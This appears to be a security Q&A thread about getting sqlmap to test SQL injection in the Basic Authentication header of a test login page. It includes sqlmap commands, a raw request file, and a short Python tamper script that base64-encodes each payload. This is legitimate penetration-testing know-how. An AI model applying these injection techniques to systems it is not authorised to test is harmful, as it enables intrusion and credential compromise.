sqlmap: Test injection in Basic Authentication?

Question

I have been trying to make sqlmap test the username parameter in a fake login page that uses basic authentication. However I cannot make it test the Authentication header via the asterisk trick:

sqlmap --auth-type "BASIC" --auth-cred="*:pass" --level 5 --risk 3 --method POST -u http://fake_endpoint.local/ --proxy http://127.0.0.1:8080

I receive at the proxy only one login attempt with literally *:pass (b64: KjpwYXNz)

POST http://fake_endpoint.local/ HTTP/1.1
Content-Length: 0
Authorization: Basic KjpwYXNz
Cache-Control: no-cache
User-Agent: sqlmap/1.4.3#stable (http://sqlmap.org)
Referer: http://fake_endpoint.local/
Host: fake_endpoint.local
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

Any ideas if this is feasible through sqlmap?

Did you end up getting it running? I am facing the exact same problem... — JJ Abrams, Feb 20 '21 at 21:50
@JJAbrams No, I used `sqlmap --headers="Authorization: Basic *"` proxying to a python http relay that encoded the payload. — chefarov, Apr 09 '21 at 11:03

multithr3at3d · Accepted Answer · 2020-04-11T04:02:54.360

Without looking at the code and just making assumptions based on your results, I think that the authorization features of sqlmap are just there to allow you to perform tests while authenticated. They are likely not intended for this type of use.

However, Authorization is just another HTTP header, and sqlmap does support testing arbitrary HTTP headers.

So you could do:

--headers="Authorization: <base64_encoded_credentials>"

Unfortunately, this does not solve the base64 encoding problem. I would likely solve this one of these ways:

Modify sqlmap to base64 encode the custom header field before making the request, or change it so your original method can be used as an injection point. The latter may be worth a pull request to the project, as others may use this feature.
Build a quick middleware proxy using something like Flask. You'd point sqlmap at the local HTTP server, which receives the request, modifies the headers as desired, and forwards it to the original destination. I've used this approach successfully before to use sqlmap against non-HTTP targets.

Yes it seems that the only solutions are 1) PR or 2) `sqlmap --headers="Authorization: Basic *"` with a middleware/proxy that performs Base64 on each sqlmap payload — chefarov, Apr 13 '20 at 22:12

Elliot · Answer 2 · 2021-12-14T04:40:32.060

This is a good use case for a custom tamper-script. Using the following request

# ./req
POST http://fake_endpoint.local/ HTTP/1.1
Content-Length: 0
Authorization: Basic *
Cache-Control: no-cache
User-Agent: sqlmap/1.4.3#stable (http://sqlmap.org)
Referer: http://fake_endpoint.local/
Host: fake_endpoint.local
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

and the following tamper script

#./tamper/basic_auth.py
import base64

def tamper(payload, **kwargs):
    auth = b'username:' + payload.encode()
    return base64.b64encode(auth).decode()

The following call to sqlmap will inject into the password

$ sqlmap -r ./req --tamper=./tamper/basic_auth.py

One of the early requests contains

Authorization: Basic dXNlcm5hbWU6NjUyOA==

for the header, which decodes to username:6528

You may want to add the --proxy http://localhost:8080 flag so that your requests go through Burp and you can confirm that they're being properly encoded, and --ignore-code 403 so that any 403 errors using base request (with no authentication) don't affect the operation of sqlmap.

sqlmap: Test injection in Basic Authentication?

2 Answers2